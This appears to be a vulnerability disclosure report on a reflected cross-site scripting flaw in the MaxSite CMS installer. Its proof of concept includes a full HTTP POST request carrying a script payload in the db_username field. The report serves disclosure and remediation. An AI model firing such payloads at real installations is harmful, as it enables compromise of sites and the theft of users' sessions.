Cross-site Scripting (XSS) - Generic in maxsite/cms
Mar 25th 2021
Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.
🕵️♂️ Proof of Concept
While setting up MaxSite CMS it requires us to fill up database info and db_username is being reflected on the page and if we put <script>alert(1)</script> in the db name field and submit the form to get the popup. Here's the HTTP request: POST /cms-1/install/ HTTP/1.1 Host: localhost User-Agent: BadBoy17 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 190 Origin: http://localhost Connection: close Referer: http://localhost/cms-1/install/ Upgrade-Insecure-Requests: 1 username=hack&password=1234&email=hack%40hack.io&site_name=Pwn&db_hostname=localhost&db_username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&db_password=root&db_database=max&db_dbprefix=mso_
With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.